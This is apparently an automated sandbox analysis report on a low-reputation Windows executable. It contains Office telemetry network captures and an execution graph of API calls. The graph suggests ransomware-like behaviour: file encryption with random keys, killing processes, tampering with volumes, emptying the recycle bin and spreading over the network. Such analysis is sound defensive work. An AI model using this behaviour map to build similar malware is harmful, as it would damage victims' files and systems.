                                2024-12-03 16:52:22 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                Session IDSource IPSource PortDestination IPDestination Port
                                148192.168.2.55011613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:22 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:22 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1389
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE0F427E7"
                                x-ms-request-id: 68ec8e83-c01e-002b-3fee-446e00000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f7845968swgbqhC1EWRmnb4000000169g00000000pet1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:22 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                Session IDSource IPSource PortDestination IPDestination Port
                                149192.168.2.55011713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:22 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:23 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1352
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                ETag: "0x8DC582BDD0A87E5"
                                x-ms-request-id: ab01a2f3-c01e-0079-17e9-41e51a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f78459685m244hC1EWRgp2c000000161g00000000cwz9
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:23 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:11:50:45
                                Start date:03/12/2024
                                Path:C:\Users\user\Desktop\win_gui.exe.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\win_gui.exe.exe"
                                Imagebase:0x5c0000
                                File size:1'753'088 bytes
                                MD5 hash:63E4D0E113333B0BD2AF6ADB9F06C639
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:4.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:53.9%
                                  Total number of Nodes:1111
                                  Total number of Limit Nodes:42
                                  execution_graph 71474 5c173d 71475 5c173b 71474->71475 71475->71474 71497 5c9f53 FindFirstFileW 71475->71497 71477 5c1762 71479 5c17ac GetEnvironmentVariableW 71477->71479 71480 5c17c8 71477->71480 71479->71480 71500 5c9ff2 71480->71500 71483 5c183e 71507 5c9fa1 CreateFileW 71483->71507 71484 5c17e8 71484->71483 71513 5d3000 21 API calls _strftime 71484->71513 71485 5c1860 71485->71485 71487 5c1911 lstrcpyW lstrcatW 71485->71487 71489 5c1949 71487->71489 71489->71489 71491 5c195c lstrcatW 71489->71491 71493 5c1972 lstrlenA 71491->71493 71494 5c19f3 71491->71494 71493->71494 71495 5c1982 lstrcatW MultiByteToWideChar 71493->71495 71495->71494 71498 5c9f6f FindClose 71497->71498 71499 5c9f86 71497->71499 71498->71477 71499->71477 71501 5c9f53 2 API calls 71500->71501 71502 5ca003 71501->71502 71503 5c17dc 71502->71503 71504 5ca007 CreateFileW 71502->71504 71503->71485 71510 5c7c96 71503->71510 71505 5ca02c ReadFile CloseHandle 71504->71505 71506 5ca042 71504->71506 71505->71506 71506->71503 71508 5c9fcf WriteFile CloseHandle 71507->71508 71509 5c1858 71507->71509 71508->71509 71514 5c5cd2 RtlFreeHeap 71509->71514 71511 5c7ca4 CryptGenRandom 71510->71511 71512 5c7cb2 71510->71512 71511->71512 71512->71484 71513->71483 71514->71485 71515 5cc728 71516 5cc74a 71515->71516 71517 5ce485 71515->71517 71520 5ce43d 71516->71520 71521 5cc750 71516->71521 71518 5cebae 71517->71518 71519 5ce492 71517->71519 71953 5cc3bf RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71518->71953 71522 5ce49d 71519->71522 71523 5ce90a 71519->71523 71527 5ce459 GetKeyState 71520->71527 71645 5cc847 71520->71645 71524 5cc75c 71521->71524 71525 5ce3c3 6 API calls 71521->71525 71529 5ce4a8 71522->71529 71530 5ce763 71522->71530 71528 5ce921 71523->71528 71523->71645 71531 5cc765 71524->71531 71532 5ce2e1 71524->71532 71948 5c5cd2 RtlFreeHeap 71525->71948 71536 5ce46a GetKeyState 71527->71536 71527->71645 71537 5ce92e ShowWindow 71528->71537 71538 5ceab7 ShowWindow PostMessageW 71528->71538 71539 5ce58b SendMessageW 71529->71539 71560 5ce4b1 71529->71560 71544 5ce8df 71530->71544 71547 5ce778 SendMessageW 71530->71547 71564 5ce8ee 71530->71564 71541 5ce2d5 DestroyWindow 71531->71541 71542 5cc770 71531->71542 71940 5cc6f6 GetWindowRect 71532->71940 71534 5cc84d DefWindowProcW 71535 5cebb3 71548 5cebcf DragQueryFileW 71535->71548 71553 5c712c 3 API calls 71535->71553 71535->71645 71536->71645 71570 5ce93e SendMessageW 71537->71570 71545 5ceaeb 71538->71545 71538->71570 71539->71645 71726 5ce5b2 __aulldiv __aulldvrm 71539->71726 71541->71645 71566 5cc794 71542->71566 71567 5cdbc6 71542->71567 71542->71645 71543 5ce40c 71949 5c5cd2 RtlFreeHeap 71543->71949 71544->71645 71951 5c5cd2 RtlFreeHeap 71544->71951 71545->71570 71546 5ce2e8 MoveWindow 71941 5cc6f6 GetWindowRect 71546->71941 71551 5ce806 71547->71551 71552 5ce796 71547->71552 71554 5cec65 71548->71554 71555 5cebe7 71548->71555 71575 5ce814 SendMessageW SendMessageW SendMessageW SendMessageW 71551->71575 71562 5ce79d SendMessageW lstrcmpiW 71552->71562 71553->71548 71554->71645 71957 5c73f4 EnterCriticalSection LeaveCriticalSection 71554->71957 71587 5cec4d DragQueryFileW 71555->71587 71588 5cebf7 DragQueryFileW 71555->71588 71954 5c5c2d RtlAllocateHeap 71555->71954 71556 5ce5b7 SendMessageW EnterCriticalSection 71556->71726 71558 5ce41f DeleteCriticalSection PostQuitMessage 71558->71645 71559 5ce57f 71950 5c5cd2 RtlFreeHeap 71559->71950 71560->71559 71584 5ce4dd SendMessageW 71560->71584 71560->71645 71561 5ce30c MoveWindow 71942 5cc70f GetWindowRect 71561->71942 71562->71544 71574 5ce7e6 SendMessageW 71562->71574 71564->71534 71952 5c5cd2 RtlFreeHeap 71564->71952 71576 5cc79a 71566->71576 71577 5cd976 71566->71577 71568 5cdeec 71567->71568 71569 5cdbd3 71567->71569 71580 5cdef8 71568->71580 71581 5ce182 71568->71581 71582 5cdbd9 71569->71582 71583 5cdeda 71569->71583 71570->71645 71574->71551 71574->71562 71575->71544 71578 5cd90c 71576->71578 71579 5cc7a7 71576->71579 71868 5c9ebc 71577->71868 71601 5cd96d DestroyWindow 71578->71601 71602 5cd914 71578->71602 71603 5cd2ff 71579->71603 71604 5cc7b9 71579->71604 71754 5cd585 71579->71754 71590 5ce00a 71580->71590 71591 5cdf05 71580->71591 71939 5cc3bf RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71581->71939 71592 5cdebc 71582->71592 71593 5cdbe5 71582->71593 71910 5c6a84 71583->71910 71595 5ce51e 71584->71595 71596 5ce528 SendMessageW SendMessageW SendMessageW 71584->71596 71585 5ce32f 71943 5cc6f6 GetWindowRect 71585->71943 71587->71554 71587->71555 71600 5c9f53 2 API calls 71588->71600 71609 5ce090 SendMessageW 71590->71609 71610 5ce013 SendMessageW 71590->71610 71606 5cdfc5 71591->71606 71607 5cdf11 71591->71607 71909 5cc3bf RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71592->71909 71608 5cdc5a 71593->71608 71626 5cdbf9 71593->71626 71595->71596 71596->71559 71599 5cd97b 71614 5cdba2 71599->71614 71615 5cd983 71599->71615 71616 5cec0f 71600->71616 71601->71645 71617 5cd91c 71602->71617 71618 5cd95d 71602->71618 71815 5cc5f3 RtlAllocateHeap RtlFreeHeap GetOpenFileNameW 71603->71815 71622 5ccc2a 71604->71622 71623 5cc7c5 71604->71623 71621 5d1a97 3 API calls 71606->71621 71625 5cdf1d 71607->71625 71607->71645 71908 5cc3bf RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71608->71908 71609->71534 71660 5ce085 71609->71660 71610->71534 71610->71660 71612 5ce33d MoveWindow 71944 5cc6f6 GetWindowRect 71612->71944 71613 5ce187 71630 5ce18f 71613->71630 71613->71645 71873 5cc4b3 7 API calls 71614->71873 71872 5cc36c RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71615->71872 71679 5cec13 71616->71679 71633 5cd924 71617->71633 71634 5cd941 71617->71634 71846 5cc3bf RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71618->71846 71620 5ce65b LeaveCriticalSection 71620->71726 71637 5cdfcf 71621->71637 71810 5cc5f3 RtlAllocateHeap RtlFreeHeap GetOpenFileNameW 71622->71810 71638 5cc8c6 71623->71638 71639 5cc7d1 71623->71639 71937 5c6c18 PostQueuedCompletionStatus 71625->71937 71640 5cdc4a 71626->71640 71641 5cdc01 71626->71641 71627 5cec7c 71627->71645 71652 5c7183 5 API calls 71627->71652 71644 5c712c 3 API calls 71630->71644 71633->71645 71820 5cc3bf RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71633->71820 71838 5cc4b3 7 API calls 71634->71838 71636 5cdec1 71636->71645 71647 5cdec9 SHEmptyRecycleBinW 71636->71647 71938 5c6c18 PostQueuedCompletionStatus 71637->71938 71770 5cc666 8 API calls 71638->71770 71657 5cc7dd 71639->71657 71658 5cc864 SendMessageW 71639->71658 71896 5ca715 GetLogicalDriveStringsW 71640->71896 71641->71645 71659 5cdc0d 71641->71659 71663 5ce19a SendMessageW 71644->71663 71645->71534 71647->71645 71648 5ce702 SendMessageW SendMessageW 71648->71556 71667 5cc8c4 71648->71667 71668 5cecc4 71652->71668 71653 5cd962 71653->71645 71847 5cb8a2 71653->71847 71654 5ce35a 71945 5cc70f GetWindowRect 71654->71945 71655 5cdba7 71655->71645 71874 5cc3bf RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71655->71874 71657->71645 71672 5cc7e9 SendMessageW 71657->71672 71658->71645 71673 5cc880 SendMessageW SendMessageW 71658->71673 71674 5cdc3d 71659->71674 71891 5d1a97 71659->71891 71660->71534 71676 5ce269 71663->71676 71677 5ce1ba 71663->71677 71665 5cd946 71665->71645 71839 5cc3bf RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71665->71839 71667->71645 71681 5c8c94 130 API calls 71668->71681 71672->71645 71688 5cc803 SendMessageW SendMessageW 71672->71688 71673->71667 71673->71673 71895 5c6a5c 6 API calls 71674->71895 71675 5cd60c 71675->71645 71818 5cc36c RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71675->71818 71717 5c7183 5 API calls 71676->71717 71692 5ce1bf SendMessageW SendMessageW 71677->71692 71678 5cd931 71678->71645 71821 5cb21b 71678->71821 71693 5c7183 RtlAllocateHeap RtlFreeHeap EnterCriticalSection lstrcmpiW LeaveCriticalSection 71679->71693 71955 5c9f8a GetFileAttributesW 71679->71955 71956 5c5cd2 RtlFreeHeap 71679->71956 71697 5ceccc 71681->71697 71683 5ce365 MoveWindow 71946 5cc6f6 GetWindowRect 71683->71946 71685 5cdbb4 71685->71645 71875 5cbb5f CoInitializeEx 71685->71875 71686 5cd304 71686->71645 71816 5cc36c RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71686->71816 71688->71645 71688->71688 71703 5c7183 5 API calls 71692->71703 71693->71679 71708 5c8d5c 15 API calls 71697->71708 71702 5cd8ef 71714 5ccc1e 71702->71714 71715 5cd8fa 71702->71715 71716 5ce249 SendMessageW 71703->71716 71705 5cd94f 71705->71645 71840 5cb87a 71705->71840 71706 5ccc2f 71706->71645 71811 5cc36c RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71706->71811 71708->71645 71709 5ce382 SendMessageW 71947 5cc6f6 GetWindowRect 71709->71947 71711 5cd556 71711->71714 71731 5cd574 71711->71731 71737 5c712c 3 API calls 71711->71737 71713 5cc8cb 71713->71645 71771 5cc36c RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71713->71771 71809 5c5cd2 RtlFreeHeap 71714->71809 71819 5ca9da 37 API calls __vfprintf_l 71715->71819 71716->71676 71716->71692 71724 5ce2aa 71717->71724 71734 5c8c94 130 API calls 71724->71734 71726->71556 71726->71620 71726->71648 71728 5ccf5d 71728->71714 71735 5ccf68 71728->71735 71730 5ce3ab SendMessageW 71730->71645 71738 5c7183 5 API calls 71731->71738 71733 5ccb5d 71733->71714 71744 5ccb7b 71733->71744 71772 5c712c EnterCriticalSection 71733->71772 71740 5ce2b2 71734->71740 71812 5c9d60 11 API calls 71735->71812 71737->71731 71738->71754 71745 5c8d5c 15 API calls 71740->71745 71776 5c7183 71744->71776 71745->71667 71746 5ccf6f 71751 5ccf77 71746->71751 71752 5cd162 71746->71752 71813 5cc36c RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71751->71813 71814 5cc36c RtlAllocateHeap RtlFreeHeap wvsprintfW MessageBoxW 71752->71814 71754->71714 71754->71754 71817 5cc5f3 RtlAllocateHeap RtlFreeHeap GetOpenFileNameW 71754->71817 71761 5cd15a 71761->71714 71763 5c7183 5 API calls 71765 5ccc0e 71763->71765 71789 5c8c94 71765->71789 71770->71713 71771->71733 71774 5c7139 71772->71774 71773 5c7168 LeaveCriticalSection 71773->71744 71774->71773 71775 5c5cd2 RtlFreeHeap 71774->71775 71775->71774 71777 5c7198 EnterCriticalSection 71776->71777 71778 5c7191 71776->71778 71779 5c71bf 71777->71779 71780 5c71a6 71777->71780 71778->71714 71778->71763 71958 5c5c2d RtlAllocateHeap 71779->71958 71780->71779 71782 5c71ab lstrcmpiW 71780->71782 71782->71780 71783 5c71eb 71782->71783 71784 5c7226 LeaveCriticalSection 71783->71784 71784->71778 71785 5c71c7 71785->71783 71959 5c5c2d RtlAllocateHeap 71785->71959 71787 5c71e5 71787->71783 71960 5c5cd2 RtlFreeHeap 71787->71960 71790 5c8d58 71789->71790 71791 5c8ca7 GetSystemInfo 71789->71791 71803 5c8d5c 71790->71803 71961 5c5c2d RtlAllocateHeap 71791->71961 71793 5c8cd8 71793->71790 71794 5c712c 3 API calls 71793->71794 71795 5c8cec 71794->71795 71796 5c712c 3 API calls 71795->71796 71797 5c8cf6 71796->71797 71798 5c712c 3 API calls 71797->71798 71799 5c8d00 71798->71799 71800 5c8d09 CreateThread 71799->71800 71801 5c8d2c 71799->71801 71800->71800 71800->71801 71987 5c7e38 71800->71987 71801->71790 71802 5c8d2e CreateThread 71801->71802 71802->71801 71962 5c812d 71802->71962 71804 5c8d8e 71803->71804 71805 5c8d66 71803->71805 71804->71714 71805->71804 71806 5c8d87 71805->71806 71807 5c8d73 CreateThread 71805->71807 72125 5c85ee 71806->72125 71807->71714 72157 5c85ee 14 API calls 71807->72157 71809->71645 71810->71706 71811->71728 71812->71746 71813->71761 71814->71761 71815->71686 71816->71711 71817->71675 71818->71702 71819->71761 71820->71678 72158 5c1000 lstrlenA 71821->72158 71824 5cb239 CreateToolhelp32Snapshot Process32FirstW 71826 5cb403 CloseHandle 71824->71826 71830 5cb266 71824->71830 71825 5cb413 71825->71645 72174 5c10b9 RtlFreeHeap 71826->72174 71829 5cb412 71829->71825 71831 5cb3ec Process32NextW 71830->71831 71832 5cb283 OpenProcess 71830->71832 72170 5c10f6 71830->72170 71831->71830 71833 5cb402 71831->71833 71832->71831 71834 5cb29d TerminateProcess 71832->71834 71833->71826 71835 5cb3e5 CloseHandle 71834->71835 71837 5cb2ae 71834->71837 71835->71831 71836 5d1c06 9 API calls 71836->71837 71837->71835 71837->71836 71838->71665 71839->71705 71841 5cb8a1 71840->71841 71842 5cb883 71840->71842 71841->71645 71843 5cb89a 71842->71843 71844 5cb887 CreateThread 71842->71844 72177 5cb49b GetTickCount OpenSCManagerW 71843->72177 71844->71645 71846->71653 72210 5c5c2d RtlAllocateHeap 71847->72210 71849 5cb8b7 71850 5cb922 lstrcpyW 71849->71850 71861 5cbb5a 71849->71861 71851 5cb933 GetDriveTypeW 71850->71851 71852 5cb942 71851->71852 71852->71851 71853 5cb952 71852->71853 72211 5c5c2d RtlAllocateHeap 71853->72211 71855 5cb95c 71856 5cb966 FindFirstVolumeW 71855->71856 71857 5cbb53 71855->71857 71859 5cb975 71856->71859 72213 5c5cd2 RtlFreeHeap 71857->72213 71860 5cbb43 FindVolumeClose 71859->71860 71863 5cb98d GetVolumePathNamesForVolumeNameW 71859->71863 71866 5cbb2c FindNextVolumeW 71859->71866 71867 5d1c06 9 API calls 71859->71867 72212 5c5cd2 RtlFreeHeap 71860->72212 71861->71645 71864 5cb9ab lstrlenW 71863->71864 71865 5cb9c1 SetVolumeMountPointW 71863->71865 71864->71865 71864->71866 71865->71859 71866->71859 71866->71860 71867->71859 72214 5c5c85 71868->72214 71871 5c9ef3 71871->71599 71872->71645 71873->71655 71874->71685 71876 5cbb8d 71875->71876 71877 5cbb94 CoInitializeSecurity 71875->71877 71876->71645 71878 5cbbaf CoCreateInstance GetNativeSystemInfo 71877->71878 71883 5cc050 CoUninitialize 71877->71883 71879 5cbbe3 CoCreateInstance 71878->71879 71881 5cbdc7 71878->71881 71880 5cbbfe VariantInit 71879->71880 71879->71883 71882 5cbd7a 71880->71882 71881->71881 71881->71883 71884 5cbe53 CoSetProxyBlanket 71881->71884 71882->71882 71886 5cbdb0 VariantClear 71882->71886 71883->71876 71884->71883 71889 5cbe6f 71884->71889 71886->71881 71886->71883 71887 5cc0cf VariantInit 71887->71889 71888 5cc313 VariantClear 71888->71889 71889->71883 71889->71887 71889->71888 71890 5d1c06 9 API calls 71889->71890 71890->71889 71892 5cdc20 CreateThread 71891->71892 71893 5d1aa3 71891->71893 71892->71674 71893->71892 71894 5d1afa EnterCriticalSection KiUserCallbackDispatcher LeaveCriticalSection 71893->71894 71894->71892 71895->71667 71897 5ca736 71896->71897 71898 5ca7d6 71896->71898 72216 5c5c2d RtlAllocateHeap 71897->72216 71898->71645 71900 5ca743 71900->71898 71901 5ca750 GetLogicalDriveStringsW lstrlenW 71900->71901 71905 5ca763 71901->71905 71906 5ca7cc 71901->71906 71903 5c7183 5 API calls 71903->71905 71904 5ca7b9 lstrlenW 71904->71905 71904->71906 71905->71903 71905->71904 71905->71905 72217 5d1b5f 71905->72217 72229 5c5cd2 RtlFreeHeap 71906->72229 71908->71645 71909->71636 71911 5c6a9a 71910->71911 71925 5c6ba5 71910->71925 71911->71925 72234 5c5ce2 socket 71911->72234 71914 5c6ba7 71916 5c6baf DeleteCriticalSection CloseHandle 71914->71916 71917 5c6bc2 71914->71917 71915 5c6ad1 gethostname 71918 5c6ae8 gethostbyname 71915->71918 71919 5c6afa CreateIoCompletionPort 71915->71919 71916->71917 71920 5c6bce 71917->71920 71921 5c6bcb CloseHandle 71917->71921 71918->71919 71919->71917 71922 5c6b12 InitializeCriticalSection 71919->71922 71923 5c6bd7 CloseHandle 71920->71923 71920->71925 71921->71920 72238 5c5d50 GetIpNetTable 71922->72238 71923->71925 71931 5c6bf0 71925->71931 71927 5c6b57 CreateThread 71927->71914 71928 5c6b71 CreateThread 71927->71928 72277 5c606c 71927->72277 71928->71914 71929 5c6b8b PostQueuedCompletionStatus 71928->71929 72256 5c6336 CreateTimerQueue 71928->72256 71930 5d1a97 3 API calls 71929->71930 71930->71925 71932 5c6bf9 71931->71932 71933 5c6c17 71931->71933 71934 5c6bfd CreateThread 71932->71934 71935 5c6c10 71932->71935 71933->71645 71934->71645 72342 5c671d 14 API calls 71934->72342 72330 5c671d 71935->72330 71939->71613 71940->71546 71941->71561 71942->71585 71943->71612 71944->71654 71945->71683 71946->71709 71947->71730 71948->71543 71949->71558 71950->71645 71951->71564 71952->71645 71953->71535 71954->71555 71955->71679 71956->71587 71957->71627 71958->71785 71959->71787 71960->71783 71961->71793 72018 5c5c2d RtlAllocateHeap 71962->72018 71964 5c85e3 71965 5c7277 10 API calls 71972 5c8146 71965->71972 71966 5c856f Sleep 71966->71972 71968 5c85dc 72025 5c5cd2 RtlFreeHeap 71968->72025 71970 5c81cb InterlockedIncrement 71970->71972 71971 5c73f4 EnterCriticalSection LeaveCriticalSection 71971->71972 71972->71964 71972->71965 71972->71966 71972->71968 71972->71970 71972->71971 71973 5c9fa1 3 API calls 71972->71973 71974 5c8253 FindFirstFileW 71972->71974 71976 5c851e FindClose 71972->71976 71977 5c850a FindNextFileW 71972->71977 71979 5c82cb lstrcmpW 71972->71979 71980 5c853d Sleep 71972->71980 71981 5c8431 lstrcmpW 71972->71981 71983 5c10f6 lstrcmpiW 71972->71983 71984 5c834a lstrcmpW 71972->71984 71985 5c7183 5 API calls 71972->71985 71986 5c84f0 Sleep 71972->71986 72019 5c7234 EnterCriticalSection 71972->72019 72024 5c5cd2 RtlFreeHeap 71972->72024 71973->71972 71974->71972 71976->71972 71977->71972 71977->71976 71978 5c8530 InterlockedDecrement 71978->71972 71979->71972 71980->71972 71981->71972 71982 5c8453 lstrcmpW 71981->71982 71982->71972 71983->71972 71984->71972 71985->71972 71986->71972 72027 5c5c2d RtlAllocateHeap 71987->72027 71989 5c7e4e 71990 5c811c 71989->71990 72028 5c5c2d RtlAllocateHeap 71989->72028 72098 5c1a1a RtlFreeHeap 71990->72098 71993 5c7e63 71993->71990 72029 5c5c2d RtlAllocateHeap 71993->72029 71994 5c8126 71996 5c8076 Sleep 71998 5c7e78 71996->71998 71997 5c7234 3 API calls 71997->71998 71998->71990 71998->71996 71998->71997 71999 5c80bb Sleep 71998->71999 72000 5c7eaf InterlockedIncrement 71998->72000 72002 5c73f4 EnterCriticalSection LeaveCriticalSection 71998->72002 72003 5c7277 10 API calls 71998->72003 72008 5c8059 Sleep 71998->72008 71999->71998 72030 5c1a4d GetFileAttributesW 72000->72030 72002->71998 72003->71998 72005 5c7f26 EnterCriticalSection 72014 5c7ec9 72005->72014 72006 5c804c InterlockedDecrement 72006->71998 72008->71998 72009 5c7f8a LeaveCriticalSection 72009->72014 72011 5c7fb8 EnterCriticalSection PostMessageW PostMessageW LeaveCriticalSection 72011->72014 72012 5c800e 72013 5c803a Sleep 72012->72013 72015 5c8017 EnterCriticalSection PostMessageW LeaveCriticalSection 72012->72015 72092 5c9f0e 72013->72092 72014->72005 72014->72009 72014->72011 72014->72012 72014->72013 72090 5d1b3f IsWindowVisible 72014->72090 72091 5c5cd2 RtlFreeHeap 72014->72091 72097 5c5cd2 RtlFreeHeap 72014->72097 72015->72013 72018->71972 72020 5c726b LeaveCriticalSection 72019->72020 72021 5c7248 72019->72021 72020->71972 72026 5c5cd2 RtlFreeHeap 72021->72026 72023 5c726a 72023->72020 72024->71978 72025->71964 72026->72023 72027->71989 72028->71993 72029->71998 72031 5c1a8f 72030->72031 72032 5c1ab0 CreateFileW GetLastError 72030->72032 72031->72032 72035 5c1a93 SetFileAttributesW 72031->72035 72033 5c1b14 GetFileSizeEx 72032->72033 72034 5c1ad5 72032->72034 72050 5c1b36 72033->72050 72073 5c1b2a 72033->72073 72037 5c7054 8 API calls 72034->72037 72049 5c1b0c 72034->72049 72035->72032 72036 5c1aa1 72035->72036 72099 5c7054 72036->72099 72040 5c1ae6 72037->72040 72109 5ca48c 72040->72109 72042 5c1aed CreateFileW 72042->72033 72042->72049 72043 5c21d9 CloseHandle 72044 5c21e0 72043->72044 72045 5c21fc lstrcmpW 72044->72045 72046 5c2220 lstrcpyW 72044->72046 72044->72049 72045->72046 72047 5c220a MoveFileW 72045->72047 72052 5c2234 72046->72052 72048 5c221c 72047->72048 72047->72049 72048->72046 72049->72014 72051 5c1ba5 ReadFile 72050->72051 72054 5c1bc2 72050->72054 72051->72054 72052->72049 72053 5c29fe lstrcatW 72052->72053 72055 5c9f53 2 API calls 72053->72055 72057 5c1bde SetFilePointerEx ReadFile ReadFile ReadFile 72054->72057 72059 5c1c41 SetFilePointerEx SetFilePointerEx ReadFile 72054->72059 72058 5c2a1b 72055->72058 72057->72059 72058->72049 72060 5c9fa1 3 API calls 72058->72060 72061 5c1d16 72059->72061 72060->72049 72062 5c7c96 CryptGenRandom 72061->72062 72064 5c1d71 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72062->72064 72063 5c1ee9 